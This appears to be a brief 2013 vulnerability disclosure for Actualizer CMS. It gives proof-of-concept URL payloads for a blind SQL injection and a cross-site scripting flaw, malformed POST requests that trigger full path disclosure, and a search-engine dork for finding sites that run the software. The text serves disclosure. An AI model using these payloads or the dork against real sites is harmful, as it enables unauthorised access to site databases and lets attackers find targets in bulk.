Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact: [email protected]

1. Blind SQL Injection

host/galeria/galeria-2 /gal,1 ‘%20or%20’1’=’2.html – false
host/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘= ‘ 1. html – true

PoC:

http://site/galeria/galeria-2/gal,1 ‘%20or%20 ‘1’=’ 2. html

2. Cross Site Scripting

host/katalog/nowosci/archiwum/year,”xss

PoC:

site/katalog/nowosci/archiwum/year,”xss

3. Full Path Disclosure
host/newsletter.php
POST: action=save&cat=666%email[][email protected]&imie=devil

host/konto/rejestracja
POST (multipart): login=1